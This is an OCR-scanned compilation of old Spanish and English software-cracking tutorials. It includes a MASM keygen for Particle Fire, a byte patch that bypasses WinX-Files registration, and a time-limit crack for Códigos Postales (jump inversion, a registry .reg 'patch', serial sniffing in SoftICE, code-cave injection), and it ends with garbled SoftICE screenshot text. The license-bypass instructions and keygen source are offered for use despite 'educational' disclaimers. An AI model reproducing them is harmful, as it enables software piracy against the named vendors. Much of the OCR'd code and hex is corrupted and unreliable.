inc [Serial_Start] ¿ aumentamos en uno el número de partida 

mov eax,Serial_Start ; lo pasamos a EAX para hacer el test 

mov edi,eax ¿ pero edi guarda una copia por si sale bien 
mov ecx, eax ¿ y comienza la fiesta... 


mov esi,eax 

shl ecx, 14h 

mov edx,eax 

shl esi,10h 

and ecx, Offf00000h 

shr edx, 10h 

or esi,edx 

sub edx, edx 

xor esi,ecx 

mov ecx, eax 

shr ecx,0ch 

xor esi,ecx 

mov ecx,2694h 

xor eax,esi 

div ecx 

test edx,edx 

jnz Calculo ; si no es un serial válido, prueba otra vez 

invoke MessageBoxA, NULL, addr MsgBoxText,addr MsgBoxCaption,MB_OK 
¿ este messagebox hace saltar el breakpoint y nos permite mirar 


¿ en EDI el último número probado, es decir el bueno 
invoke ExitProcess, NULL 
end start 


Espero que al menos se entienda la idea. Mi intención es que otros como yo le pierdan un poco el 
miedo al assembler y vean que, aunque falten conocimientos, con un poco de ingenio a veces se 
pueden solucionar los problemas. 


6. Opción no tan fácil: creación de un keygen semi-decente 


Pero como crear un key-gen, nada. Yo al final creé uno, estoy seguro que está fatal programado, que 
da pena y que quizás solo funcione en mi PC, pero me da números de registro buenos. He de decir 
que no podría haberlo creado sin la *gran* ayuda de Mr. Crimson que me proporcionó una rutina 
para convertir de hexadecimal a decimal (para poder sacar el resultado como string en un msgbox). 
Muchas gracias una vez más, Mr. Crimson. El programa también utiliza la funcion gettickcount 
para crear un número distinto cada vez, aunque no totalmente aleatorio (cada vez es mayor). No es 
perfecto ni mucho menos, pero da el pego. Para el que le interese: 


.386 

.model flat, stdcall 

option casemap:none 

include c:imasm32Xincludewindows.inc 
include c:imasm32Xincludelkernel32.inc 
includelib c:imasm321M1liblkernel32.lib 
include c:imasm32lincludeluser32.inc 


includelib c:imasm321Mlibluser32.lib 


. data 

MsgBoxCaption db "SuperCutre's Key-Gen",0 

Mensaje db " = (by Champion) =",13,13," Se va 
a generar un",13," número de serie 

para",13," Particle Fire vl.la",0 


MsgBoxCaption2 db " Su número:",0 
Buffer db 10 dup(0),0 
Serial_Start dd 3b%aca00h 


. code 
start: 


invoke MessageBox, NULL, addr Mensaje,addr MsgBoxCaption,MB_OK 
invoke GetTickCount 
add [Serial_Start],eax 


Calculo: 

inc [Serial_Start] 
mov eax,Serial_Start 
mov edi,eax 

mov ecx, eax 

mov esi,eax 

shl ecx, 14h 

mov edx,eax 

shl esi,10h 

and ecx, 0Offf00000h 
shr edx, 10h 

or esi,edx 

sub edx, edx 


xor esi,ecx 
mov ecx, eax 
shr ecx,0ch 
xor esi,ecx 
mov ecx,2694h 
xor eax,esi 
div ecx 

test edx,edx 
jnz Calculo 
nop 


mov eax,edi ; lo preparo para la Hex a Dec 
mov esi,offset Buffer 


add esi,11 
mov byte ptr[esi],00 
dec esi 


; Hex a Dec proporcionado por Mr. Crimson 
mov ecx,00000010 
c20: cmp eax,ecx 

jb c30 

xor edx,edx 

div ecx 

or dl,30h 

mov byte ptrl[esi],dl 
dec esi 

jmp c20 

c30: or al,30h 

mov byte ptrl[esi],al 


invoke MessageBox, NULL, ESI,addr MsgBoxCaption2, MB_OK 
invoke ExitProcess, NULL 
end start 


7. Conclusiones finales 


Para terminar veamos a modo de resumen lo que hemos hecho: 


1. Poner bpx en regqueryvalueexa 

2. Encontrar donde lee y guarda nuestro serial 

3. Encontrar la rutina que luego lo lee y lo verifica 

4. Estudiar ese código y ser capaces de crear una clave válida 


He de decir por pen-último, que con posterioridad a todo lo explicado, me he encontrado dos patchers 
en internet para Particle Fire v1.1a, pero ningún keygen, lo cual confirma que lo más fácil es parchear 
bien y no mirar a quien. Asímismo, de los dos parcheadores, uno no funciona (al menos a mí), y el 
otro me parece que no tiene mucho estilo, porque lo que hace es dedicarse a sustituir el inicio de 
todas las cadenas de texto por 'DO' para evitar que salgan (si recordais, durante el tutorial hemos 
considerado esta opción pero la descarté porque es poco elegante, tediosa, y no sabes hasta que punto 
te garantiza resultados). Aún peor, ese patch sustituye *todas* las cadenas de texto, con lo cual se ha 
cargado no solo los mensajitos shareware si no también la parte de frases aleatorias que forman parte 
del salvapantallas estés registrado o no, y que pueden anularse con una simple casilla del cuadro 
'configurar protector de pantalla', con lo que más que parchear, se ha mutilado el programa 
innecesariamente. 


Ahora sí, por último, pedir disculpas si algo no ha quedado bien explicado, o por los errores que sin 


duda habré cometido, pero puedo asegurar que con este sistema me he librado de los mensajitos no 
deseados. Y, bueno, ahora ya puedo volver a mi antiguo salvapantallas con la cabeza bien alta... 


= Champion = 


| [ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] 


[ Tutorialz : | x Tipo de Protección | x Fecha de Publicación | x orden Alfabético ] 


Karpoff Spanis 
Tutorial Descargado de [LuUtor 


Crackeando Mas de 100 Programas VOL II ANEXO B 
V- 04 -Junio 2006 


DISCLAIMER: Please note that this is for educational purposes only. It will teach someone how to 
remove protections from programs, but not encourage it for illegal purposes. The idea, in the guide 
is to show how people add protections onto software, and how you can use your skills as a 
computer expert to undo those protections etc.. 


Introduction 


Welcome, this is the first in my installation of guides aimed at the 'newbies'. This though is different 
to all the other guides. Here is why. This guide is aimed at the very begginer in cracking... it 
contains picutes, much like a book when you were a kid. This is to make things more easier to 
understand and it really didn't take that long to do... (honestly). | could have written this in 5 lines, 
but as | said this is for the newbie. Please tell me if you want picutures or not..This is a new idea, 
and | am seeing if it helps or not. Remember this is for the NEWBIE. What | know :- 


1) Very basic knowledge of ASM 


| know what POP does, what PUSH does, a vague knowledge of what the registers do etc... | have 
a rough understanding of what is happening. 


2) Mediocre Knowledge of SOFTICE 


| know how to make breakpoints on certain windows functions, and | know basically all you really 
need to know to get by and follow the tutorials of try some basic cracking. 


3) Mediocre Knowledge of W32Dasm 


| know how to search for a string, and what it means once | have found it. 


4) Basic Knowledge of Turbo Pascal 


| know enought to understand how the key generators work, and therefore enought to make one 
myself. Also, | know how to make patchers. 


| hope that you should know the above, and probably more. Once again this is aimed at the newbie, 
and | class myself as a newbie. This tutorial is an experiment, so don't come shouting at me, that | 
am teaching you wrong tricks. If the protection has been cracked, then | don't see the problem. If | 
have mentioned something wrong, then please contact me at mrnick99Mhotmail.com and | will 
bring it around in the next tutorial session. 


What you need :- 
1) Soft-Ice 


2) W32Dasm 8.x 
3) Hexedit / Psedit 


All of the above are available from http://cracking.home.ml.org 


WEEK 1:  WINX-FILES v2.8 


NOTE: THIS HAS BEEN COVERED IN A PREVIOUS TUTORIAL. | DIDN'T REALISE UNTIL 
WRITING THIS ONE. THIS IS ANOTHER WAY, SOMEWHAT EASIER WAY OF CRACKING IT. 
(REF: PC'98 Tutorial 8) 

You can download this program from the following address : 


http://www.pepsoft.com/wxf32_ 28.zip 


INTRO 


In this lesson, we are going to crack this program so you can enter any name and any code to go 
with it. 


Step By Step 
1) Win X-Files , the protection. 


Load up Win X-Files (WXF) and notice that the product has *FUNREGISTERED? all over it. 


A PEFPSOFT WinXFiles 32-bit y 2.8 "Unregistered" 


Still 30 days free use 


O 


Encrypt/Decrypt | Viewer | Launcher | 


2-12-F4 145 40h 
Aight Click the title bar to Roll Lip 


B Pi A Decrypt C Wipe 


Full Path Name 


3 Cc p 
3 Program Files 


FILE_ID.XFD 


SETUPINF 

setuplog.txt mn 

, a >> 
SKY32Y3C.DLL Ss 
VENDINFO DIZ 
Wifiles exe 
WXFILES.HLP 

” View Pictures 


Click on the button marked.. 'Click here to register 


ai FEPSOFT MWéfinXFiles 32-bit y 2.8 *Ordering* 


Whaf you get: Use of WinXFiles per the license agreement 
FREE upgrades 


Email technical support 


Lost af WinxFies: US$24, site licenses available. 
csis:, MMMM E E) 
oi VISA (Wiedra 
AS 


Register Secure at http: /2www.PEPSOFT.com 


Registration (0802/1998) 


User Name: 


You will be presented with this screen. 


Enter a name like :- MR NICK 
Enter a key like :- 999999999 


You will then get a message saying :- 


Information 


O 


+ 


No Problemo..... 


2) Cracking WXF. 
Load up WXF into W32Dasm 8.x. 


Once this has loaded click on En on the toolbar. 


This will bring up the following box. 


W32Dasm List of String Data Items 


"| cant rename " 


"Invalid Registration Password... ——_—_—_—_—_—_—_—___— This ¡is what we are after 
"IsControl" 


"Ibis recommended that you use ' 
"ltemHeight" 


"Kr Led, version 1.00, 04-10-97" 
"LCKPRG.DLL" 


"LIBLDAMLI" 


As you can see, if you scroll down the box that popped up for us when we entered the wrong code, 
is actually here. What a peice of luck. 


Double click on this string and the following will be shown on your screen. 


FA URSoft W32Dasm Program Disassembler/Debugger (Demo Version 8.7] 
Disassembler Project Debug Search Goto Execute Te Functions HexDala Relfs Help 


[Imp e TE ha 


:00482A01 888084010000 mov eax, dword ptr [eax+000001B4] 


:00482A07 33D2 xor edx, edx 

:00482A09 EB4EDBFAFF call 0043025€ 
:00482A0E BBA5FC mov eax, dword ptr [ebp-04] 
:00482A11 E8262BFAFF call 0042553€C 
:00482A16 EB25 jmp 0048243D 


* Referenced by a (Ulnconditional or [Cjonditional Jump at Address: 
This is what we are after 


1:004829C8[C) 
:00482A18 6A00 push 00000000 

:00482A14 668B0DAC2A4800 mov cx, word ptr (00482AAC] 

:00482421 6202 mov di, 02 

* Possible StringData Ref from lote dl 0bj) ->"Invalid Regl 
:00482423 B9EC244800 moy eax, 00AB2AEC 

:00402428 EOBFE2FAFF call 00430CBC 

:00482A2D 3302 xor edx, edx 

:00482A2F 8BA5FC mov eax, dword ptr [ebp-04] 

:00482A32 8B80£8010000 mov eax, dword ptr [eax+000001£8] 
:00482438 E97B20F9FF call 00414488 


* Referenced by a (UJnconditional or (Cjonditional Jump at Addresses: 
1:00482727(U), :00482A16(U] 


| 

:0048243D 33C0 XxOor tax, tax 

:00482A3F 5A pop edx P 

:00482A40 59 pop ecx 

:00482A41 59 pop ecx bo 
: 2£ 


| Line:285260 Pg 3705 ol 3957 File Wiiez.exe 


[W320 ans “a -——————E——— NUM 


Know this is where | don't really know what is going on.. But | know enough to understand what is 
happening. The line that is highlighted is the box that is called when we enter the wrong code. 
Above that, the three lines, is | think, what is happening when we type in the wrong code. 

The thing to look for is what called this code. What part of the program actually said "Let's show a 
dialog box saying 'Invalid Registration Code etc....." 

We trace up to the nearest reference, which is the line that reads. 


"This is what we are after" 


That is where the call came from for the invalid box to be shown. So we trace upto that line and we 
are presented with the following. 


:004829C2 58 pop eax 

:004829C3 ES440FF8FF call 0040390C 

:004829CA 8BBA5FC mov eax, dword ptr [ebp-04] 
:004829CD E832040000 call 00482E04 

:004829D2 6400 push 00000000 

:004829D4 668B0DAC2A4800 mov cx, word ptr [00482AAC] 
:004829DB B202 mov di. 02 


The bit highlighted in green is the code that we want. 


At the moment, it is going to the invalid code if something is not equal. You can ignore all of the 
above for this tutorial, and this crack. This is the first point of call. You try out this first, if it doesn't 
work then you try something else, find out what it does to call that invalid box etc. 


So, all we have to do is change the jne to a je ...what this will do is if you enter the wrong code, it 
will carry on and run the code for the correct code. If you enter the correct code, it will tell you it is 
wrong. 


This is the most important bit. At the bottom of the screen is a line with the corresponding postition 
in hexedecimal. 


:004829F7 E8DO021F9FF call 00414BCC 


4 This is what we are after 


2L 


Lme:285223 Pg 3705 of 3857 Code Data (200482908 Offset 00081DC8h in File wWuhles ene 


For Help, press Fl lImage: 640 x 99 x 16 Milion - 249.5 KBytes 


OK, so the one that we are after is the Offset.... not the Code Data. In my case the number ¡is 
00081DC8 (ignore the h at the end, that shows that it is hexidecimal.) 


3) Editing the Value, and trying again. 
Exit W32DASM. and run HEXEDIT/PSEDIT. Scroll down to the point where the above code 


corresponas. ¡.e. 0OO081DC8 in my case. You will see the code that was in W32Dasm. You will see 
754E. Change the 75toa74.  Exitand save. 


4) Running the program, and seeing if it all has worked. 


As before goto the registration and enter all the details, as you did before.. 


ai FEPSGET 'WeétinxXFiles 32-bit y 2.8 *Ordering* 


What yau get: Use of WinXFiles per the license agreement 
FREE upgrades 


Email technical support 


Lost of WinxFHes: US$24, site licenses available. 
j a 
S0 vz EN 9 


Register Secure at http: ¿/www.PEPSOFT.com 


Registration (08/02/1998) 


User Name: Jue NICK 
Key: [asaa99ad 


DK | 


Here we 9O.......... are you TE AdY...ocoocoo..... Click on O.K. BINGO 


ai FEFSGEFT MitinxXiles 32-bit y 2.8 “Ordering” 


What you get: Use of WinXFiles per the license agreement 
FREE upgrades 
Email technical support 


Cost ol Winsriles 


y. . os E 1 
Register Secure at A ) WinkFiles is now registered. Thanks a lot! 


Registration (0802/19: 
User Name: jur 


Key. [989999999 
e | 


You did it.. the program is now registered. 


BUT 


| have come across programs, that do this, but once you load it up again, it needs you to register. 
This is becuase you are just stopping the box from coming up. This program will actually place all 
your details into the registry office, so it saves it. You now have a free copy of Win X- Files. Please 
though pay for the product, as it is good, and this is only for educational purposes. 

Week 2 : How to make a Patcher for this product 

Week 3 : How to crack Nuts and Bolts '97 

Week 4 : Don't know...... 

Thanks very much for doing this guide with me, | have enjoyed writing it, and please spread this 
around as much as possible. BUT do not change anything in here. ¡.e. put your own name in etc.. 
that wouldn't be fair. 


Karpoff Spanish Tutor 


Programa: Códigos Postales v 4.11 


PROTECCION: Limitacion de Tiempo. 

Descripcion: Guía de códigos postales de España 

Dificultad: Principiante 

DOWNLOAD: http://members.nbci.com/codpostal/ (Cd-Actual 48) 

Herramientas: DeDe v2.x, Editor Hexa, KrackPE y Softice 

CRACKER: KuaTo_ThoR FECHA: 16/09/2000 


INTRODUCCION 


Bueno, aquí estoy otra vez. En esta ocasión voy a emplear algunas herramientas poco utilizadas, y que realmente son muy útiles, como es el 
desensamblador para Delphi DeDe de DaFixer y el KrackPE de nu MI T_or. 


Finalmente he decidido añadir cómo encontrar el número de serie correcto, para eso utilizaremos el Softice. 


AL ATAKE 


Preliminares. Obtener información. 


Lo primero como siempre es enterarnos de qué va el tema. Iniciamos el programa, esperamos a que se carguen unas cuantas cosillas... y ya está, arranca 
el programa. En la ventana principal, podemos ver unos botones a la izquierda, el último, con una llave, es el de registro, y un par de ellos más arriba 
con un dibujo del Word, es el manual de uso. Si probamos a registrar, podemos ver cómo únicamente se nos pide el código, lo cual parece indicar que 
va a ser un código único para todo el mundo. Si miramos en el manual podremos encontrar al final la parte referente a las restricciones de uso, que en 
este caso es que 30 dias después de la instalación nuestro programa dejará de funcionar. Lo curioso es que no he visto cuánto vale el programa. 


Ahora hay que ver en que lenguaje está escrito y si está comprimido. Para ello yo he utilizado el GetTyp, nos dice que está escrito en Delphi y que no 
está comprimido. Perfecto. 


Al AtaKe 


Bien, iniciamos el DeDe. En la ventana principal aparece la típica carpetita abierta de windows, pinchamos y seleccionamos el archivo 'víctima', en este 
caso codpostal.exe. Pulsamos sobre Process, esperamos unos segundos y ya está. Ahora debemos ir a Procedures, que creo que todos imaginamos lo 
que será. Nos aparece lo siguiente: 


| ¡DeDe v2.40 BETA 2A (c) 1999-2000 by DaFixer 


C:MArchivos de programa'Códigos Postalesk +] (3 


TLoginDialog 
TPasswordDialog 
TForml1 
TFormSplash 


BitBtrv Click DD49DAEC 


Normalmente los programadores pondrán un nombre sugerente a las Unidades o a algún Evento, con la palabra Register por algún lado, pero en este 
caso no, así que habrá que echárle un poco de imaginación. 


Si pulsamos sobre Unitl, en la ventana de la derecha, nos aparecerán un buen montón de Eventos, así que pasaremos de ella por el momento, las 
comprobaciones de registro suelen estar en únidades con pocos eventos. Si pulsamos sobre Unit13 y Unit3, no aparece ningún evento, así que vamos a 
Unit2. Nos aparece como vemos en la imagen un único evento, ahora pulsamos con el botón secundario del ratón sobre él, y en el menú sobre Show 
Additional Data, nos aparece lo siguiente (haciendo esto mismo podríamos haber comprobado que las dos primeras unidades manejan la base de 
datos): 


Como podemos ver vamos por buen camino, cuando pulsemos el botón registrar, después de haber introducido el serial, el programa viene justo aquí, 
no tenemos que buscar más estamos en la zona caliente. ¿Cómo ver el código? Fácil, sólo hay que pulsar dos veces sobre el evento deseado y ya está. 
Siguiendo el código podemos ver algo realmente interesante: 


0049DB46 8D45E8 lea eax, l[ebp-$18] 

0049DB49 EBAECIDF6FF call 0040A0FC <-— Pillamos el código gieno 

0049DB4E 8B55E8 mov edx, [ebp-$18] <- ¿el código gieno? 

0049DB51 58 pop eax 

0049DB52 E8F164F6FF call 00404048 <- Comparamos los códigos. 

0049DB57 750C jnz 0049DB65 <-— Saltar o no saltar esa es la cuestión. 

0049DB59 C7833402000001000000 mov dword ptr [ebx+$0234], $00000001 <- ¿Giieno? 
0049DB63 EBOA jmp 0049DB6F 
0049DB65 C7833402000003000000 mov dword ptr [ebx+$0234], $00000003 <- ¿Malo? 
0049DB6F 33C0 xor eax, eax 


Si pulsamos sobre un call, también nos aparecerá su contenido. 


Todo esto con el softice estaría claro, cómo podremos ver más adelante. Lo que está claro ahora es que si invertimos el salto 0049DB57 iremos a chico 
giúeno, podemos probarlo con un editor hexa, pero ¿cómo conseguimos el Offset? No se cómo hacerlo con el DeDe, así que voy a utilizar otra 
magnífica herramienta, ésta de nu M I T_or, el KrackPE, que sirve para cosas mucho más interesantes que ésta, como veremos más abajo. Ejecutamos 
el KrackPE, seleccionamos nuestro archivo 'víctima', donde pone Virtual Address: introducimos 49DB57, pulsamos a Get Offset y ya está. El aspecto 
es el siguiente: 


* KrackPE v0.5 - by nuMlT_or 


-— 
na 


Í 
| 00105403. 
' 
' 
' 
-) 


(750CC78334020000 | 


Donde están las XXXXXX, estaría el offset, pero os dejo que curréis un poco. 


Si habéis hecho todo, y probáis a introducir un código cualquiera veréis que lo acepta, y además podéis comprobar que es permanente, incluso si 
intentamos meter nuevamente el código nos dice que ya nos registramos anteriormente. Interesante, esto quiere decir que al registrarse crea en el 
registro (o en un archivo) una clave, que al leerla le dice que está registrado. Si cuando os registráis tenéis activado algún programa 'espía' que controle 
las entradas en el registro, o los cambios en éste, podemos comprobar que lo que cambia es lo siguiente, pone: 


[HKEY_LOCAL_MACHINESoftwareTena Códigos Postales] 
"Version"=hex:00,00,00,00,00,00,10,40 
"Producto"=hex:00,00,00,00,00,00,10,40 


donde antes ponía lo que podía ser la fecha de fin de evaluación. Si las borramos volveremos a estar sin registrar, y si deshacemos los cambios 
realizados en el editor hexa, y metemos estos datos en el registro, estaremos registrados sin introducir ningún código. Grave error, podremos crear un 


"parche" con un simple archivo .reg como el siguiente: 


REGEDIT4 


[HKEY_LOCAL_MACHINE SoftwareTena Códigos Postales] 
"Version"=hex:00,00,00,00,00,00,10,40 
"Producto"=hex:00,00,00,00,00,00,10,40 


Guardado el archivo como xxxxx.reg, sólo tenemos que 'ejecutarlo' y estaremos registrados de por vida. 


Obtener el Código Válido 


Lo primero es entrar con el Softice en el programa. Damos a registrar, escribimos un código cualquiera, por ejemplo1472583690, vamos a Softice 
(Ctrl+D), y ponemos un bpx hmemcpy. Volvemos al programa (FS), damos a registrar y salta el Softice. Borramos el break, bc0 y vamos con F12 
hasta que en la línea verde aparezca Codpostal!Code, entonces estaremos en nuestro programa. Ahora, vamos con F10, pasando por unos cuantos RET 
hasta que llegamos a 49DB38 (cómo sabíamos esta dirección podríamos haber puesto un bpx directamente aquí), si escribimos ?eax, nos aparecerá 
nuestro código. Si seguimos un poco más con Fl0, llegamos a lo de antes, vuelvo a ponerlo: 


0049DB46 8D45ES8 lea eax, [ebp-$18] 

0049DB49 ESAECSF6FF call 0040AOFC <- Pillamos el código giieno 

0049DB4E 8B55E8 mov edx, [ebp-$18] <- El código giteno 

0049DB51 58 pop eax <- El código malo 

0049DB32 ESF164F6FF call 00404048 <- Comparamos los códigos. 

0049DB57 750C ¡nz 0049DB65 <- Saltamos si nuestro código es Malo. 

0049DB59 C783340200000 1000000 mov dword ptr [ebx+$0234], $00000001 <- Giieno 
0049DB63 EBOA jmp 0049DB6F 

0049DB65 C7833402000003000000 mov dword ptr [ebx+$0234], $00000003 <- Malo 
0049DB6F 33C0 xor eax, eax 


Bueno, han desaparecido las dudas ; ) 


Para ver el código válido, sólo hay que poner ?edx, en 49DB51. 


Algo más con KrackPE 


Como os habréis podido imaginar esta herramienta sirve para bastante más que para obtener un Offset. Si os fijáis en la imagen que he puesto arriba, a 
la derecha, pone Get Greatest Space, ¿qué es esto? Pués localiza en el código del programa el mayor espacio vacío, de tal forma que podemos meter 
nuestras propias instruccciones ahí, únicamente tenemos que direccionar el programa hacia ahí. Por ejemplo: 


En este programa, en el Call que compara los códigos, únicamente nos interesa, si edx sale con valor cero o no. Si vale cero, vamos a código correcto, 
cosa que podemos conseguir con una instrucción como xor edx,edx obteniendo el mismo resultado. Por tanto si en lugar de hacer Call 00404048, 
llamamos a ese espacio vacío, en el que ponemos nuestro xor edx,edx y por supuesto un ret para salir de la llamada, tendremos que siempre acepta 
nuestro código, sea válido o no. Ya sé que en este programa todo este trabajo es una chorrada, pero en otros será muy útil. 


Si pulsamos sobre Get Greatest Space, obtenemos que nuestro espacio está localizado en 4ADO014, con offset ASE14, el tamaño no nos interesa, ya que 
lo que vamos a meter no ocupa nada. Ya sabemos donde tiene que apuntar nuestro call y lo que queremos meter. Sólo queda saber cómo coño 
escribimos esto en nuestro editor hexa. Bueno, voy a poner cómo se escribe y luego una manera de obtenerlo: 


Call 4AD014 ---> E8BDF40000 
xor edx, edx ----> 31D2 


Los dos últimos siempre se escriben así, pero el primero es un poco más jodido. Cómo sacarlo, una forma sencilla es con el Wdasm, desensamblamos 
el ejecutable original, vamos al menú Debug y seleccionamos Load Process, damos a Load, ya sólo queda ir a la dirección donde queremos cambiar 
algo, en el caso del call a 49DB52, pulsamos a Patch Code, metemos la nueva instrucción, en este caso Call 4AD014, damos a enter, y nos aparece 
cómo escribirlo. Hay otras maneras de obtenerlo, pero creo que ésta es bastante sencilla. 


Obtenemos el offset del Call, que es 9CF32 y ya sólo tenemos que realizar los cambios con nuestro editor hexa. Vamos a 9CF52, y metemos 
E8BDF40000, siempre con cuidado de que nuestra nueva instrucción no ocupe más que la instrucción original, si ocupase menos podemos meter unos 
nops (90). Ahora vamos a A8E14, y metemos 31D2C3, guardamos los cambios, probamos a introducir un código cualquiera en el programa, y mensaje 
de registrado, todo perfecto. 


No siempre será tan sencillo, en muchas ocasiones habrá que reajustar otros registros, como el de la pila. Para saber que registros se modifican dentro 
de un call, lo podemos ver con el softice de manera sencilla. Lo primero es poder ver todos los registros en el softice, si no los tenéis en la parte 
superior de la pantalla, pulsad F2 y aparecerán. Los registros que se ven en azul, son los que cambian al ejecutarse cada instrucción. 


Nada más por esta vez, espero que os haya resultado útil. No olvidéis que nuestro objetivo sólo es aprender.(sin contar con la diversión por supuesto ;- 
)) 


Hasta la próxima... 


P.D.: Si hay algo que no he dejado sufientemente claro o lo que sea, ya sabéis: kuato_thorG hotmail.com 
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-9a Soft1CE Symbal Loader - [No Module Opened] 


SoftICE” 


Release 2.6 


Windows" 95 
Windows” 98 


Proyectos eenos con el depurador 


Windows* 2000 
Windows* XP 


SoftICE 4,05 8 SoftIGE Driver Suite 2,6 


¡EAX=823C6038 pODBGDÉ — ECX=BB4bBBGBA — EDX=68F940b1 ESI ES , . 
DI =8234B3E38 EBP=ED43FC9B — — ESP=ED43FC2C—— ElP=BECBBB794 odIS2A e —— Register window 
CS = 8088 DS = 6823 Ss- 40108 — ES=M0623 FS =B830 Gs-B000 — SS: ED43FC98 82306038 


CEBP+C] +struct _UNICODE_ STRING * RegistryPath = Bx8237D000 <£...>> 
[EBP+8] +struct _DRIVER_OBJECT * DriverO0bject = Mx823C603B <X...>> 
[EBP-41 void stdcall p € void > = BxBBADA346 <HOD1B: BUDA 46 > 
[CEBP-8] unsigned long InitializerCount = Hx8 e RA, 6 
CEBP-34] +class KRegistryKey Key98 = €...> — Locals window 
CEBP-6081]1 —class KRegistryKey NTKey = 

unsigned long m_CreateDisposition = BxB 

+struct _OBJECT_ATTRIBUTES m_ObjectÁttributes = (...?» A 


irpdispatchtable +long proc €* class Klrp > ::()2 array [ 28 ] = <bBxBBFFF'4B,BxBB4 
names —char * array [ 29 ] = di 
+char *[8] = BxBCOB55BAB <*"IRP_MJ_CREATE"> 
+char *[1] = BxBCBB55CA <"IRP_MJ_CREATE_NAMED_PIPE"> P— > And ; 
+char x[2] = BXBCBB55DC <"IRP_MJ_CLOSE"> Watch window 
+char *[3] = BxBCABB55EC <"IRP_MJ_READ'"> 
string'_c19B byte 
9083 :80168C693 5C BB 45 BB 47 BB-47 Ba Ba 54 Ba 
B3:30158C6A8 59 0 BB-43 BB Bu 47 Ba 
BB-53 an BB 45 Ba 
(515) BB-52 Ba BB 4E Po 
duo 
a e 
: 0BBBDAn ata wi r(1,2,3) 
aBugBBaa DABBABAA AABBBBBA Data window (1,2,3 
0623 :SB1CCDZA SaDaGaBa Bo0BdbBB6a —bBBBBBDA —BABABABA 
BoundsChecke»: :BchkdInfo word 
B 664 0648 6064 666 BBB BEBE BABA 
Bb 6600 4609 6066 666 BABA BEBA DABA 
6666 6669 BBB 666 BBB BOBA BABA 
5151515) e BBBB BAG0 BBB 606 BABA 
KTE UTEB State ProcC(1Id> 
82747628 B6BBABAaA —Hait SystemtBB8> 
82747340 BBBBAABAA Wait SystemtB8> : 
82716828 B0BBBBaa Wait SystemcB88> —— Thread window 
827A6DA6  'B66BABBBG Running SystemtBB> 
ii BBBABBBA — Hlait SystemcB8> 


pp 


074: ds 
MP5: This routine is an part of the Driver::Horks framework. It conforms 
to the system requirements for a drivers initial entry point. The 
driver writer implements member DriverEntry in the class derived from 
KDriver, and that member gets called <eventually> from here. 


DBG 

¿¿ For debug builds, initialize the connection to BoundsChecker 
BoundsChecker::Init<DriverObject?; > a 
—— Code window 


85: 
0BaSG: Hif tdefined<DISABLE_STATIC_INITIALIZERS> 
09887: ULONG Initializertount = A; 


“Y call static initializers 
void (ep>ívoid?> = StartlnitCalls+153 
Sisa <p < EndlnitCalls> 


po 0; 


++; 
InitializerCount++; 


testdrvu!tDriverEntry+40B6 a 
ntoskrn1*_lopGetDriverNameFromHe yNo de +8477 —— Stack window 
ntosken1*_lopLoadUnloadDriver+M655 

pC6A8DG8 15] 151515151515) nebskenl? ExpUbekesIhedad*AEs 

PASSIVE>—KTEB<827A6DAB>—T1D<0828 te 

SB Transaction Schedule for Host ali B: 

niversal Host Controller at PCI Bus BM Device 31 Function 2 

SB schedule at 824EF0B8 


rame A at 824EF606 


Next Entry: B24E5DAB CUf:AM Queue:1 T:B> 
SPD:6 C_ERR:B LS:AM 150: TIOC:A— ActLen:1i byt 


na e O A SoftICE” 
Proyectos ecues con el aspurador 


| |] Windows* 98 
Windows” Me 
Windows NT* 

A Windows* 2000 


Windows* XP 


—— Command window 


MuMega Soft1CE Symbol Loader - [No Module Opened] 


gain 
tICE 


Ventanas de cont 
Numega So 


(48) BoundsChecker: O Enabled (% Disabled 
DriverStudio 


Security 
El SoftICE Initialization 
General 
Symbols 
Exports € Enot Starts SOftICE before Windows loads by making 
Serial Debugging ds modifications to AUTOEXEC,BAT. 

Keyboard Mappings SOFtICE : 

Macro Definitions (* Disabled 
TroubleShooting 
Network Debugging 


Disables all SoftICE components and filters. 


ux 
(45 | BoundsChecker: (Enabled (* Disabled 
5 , TrueTime: UC Enabled 
Security ceba Se TrueCoverage: CU Enabled 
El SoftICE Initialization 
General 
Symbols 
Exports € Boot Starts SoftICE before Windows loads, This mode 
Serial Debugging is most useful For debugging device drivers. 
Keyboard Mappings SOFtICE (System Starts SoftICE with Windows. This mode is ideal 
Macro Definitions for application developers. 


TroubleShooting € Automatic SoftICE is started with Windows, but you will not SS 
Network Debugging be able to debug core device drivers. O 


(% Manual You must start SoftICE manually each time you 
need to use it. 


€ Disabled Disables all SoftICE components and filters. 
Release 2.6 


General y 
O Windows! 95 
Windows* 98 
Windows* Me 


ñ E E Windows NT? 
Windows NT/2000/XP Startup Configuration Screen Windows? 2000 


Windows* XP 


Aprendiendo a Usar el Depurador SoftICE Driver Suite 2,6 


EBX=B0000006  — ECX=-BB4b0BGBa — EDX=68F9B0b1 ESI E E a 
EBP=ED43FC9B — ESP=ED43FC2C—— ElP=BCBBB794 od IS A p —— Register window 
DS = 6823 Sss- 40106 — ES=-M0623 FS =B0830 Gs-B000 — SS: ED43FC98 82306038 Pe 


+struct _UNICODE_STRING * RegistryPath = 0x8237D000 <£...>> á 
+struct _DRIVER_OBJECT * DriverO0bject = BxB23C6030 <£...>> 1 
void stdcall p € void > = BxBBBBB346 <HOD1B:00DAB3 46 > 
unsigned long InitializerCount = Ux8 RS de 
+class KRegistryKey Key98 = €...> — Locals window 
=elass KkegistruyKey NTKey = 

unsigned long m_CreateDisposition = MxB y 

+struct _OBJECT_ATTRIBUTES m_ObjectÁttributes eS: dl» Y 


irpdispatchtable +long proc < class Klrp > ::()2 array [ 28 ] = <BxBBFFF'74B,BxBBa4 
names —-char * array [ 29 ] 1 
pe ES INC nen pares 
+char *=[1 xBCH M” . —— Wate ind , 
+char *[21] = BXBCOBS5DC <"IRP_MJ_CLOSE"> Watch window 
+char *x13] BxBCOB55EC <"IRP_MJ_READ"> 
tring ci19B ute 
0083 :8816C0698 5C 60 52 BB 45 BO 47 BB-49 00 53 BB 54 Bu 
90038 :8018C6A8 579 66 5C BOB 4D BA 41 BB-43 BA 48 BB 47 Bn 
10003 :8016C6E3 45 668 5C 66 53 60 59 BB-53 BA 54 BB 45 Bu 
1003 :36158C6C83 5C M0 43 BB 55 BB 52 BB-52 BA 45 BB 4E Bu 
PsLoadedModuleList duord 
10023 :8016CCFO 827D2248 8234EBA8 BBB —BuUBBBDAA 
0023:8B16CDB890 S016DCA6G 2B16D7A0 BBBBBBGA —BaEBBBDAD Data window (1,23) 
0823:8016CD10 BBBABBB BBABBBAGA 1pAGBBBBA —BBLBBBBAN q AA 
0023:8B816CD28 BEBABBBA BBBBBAAO BpABBBEDA —BEBABBAD 
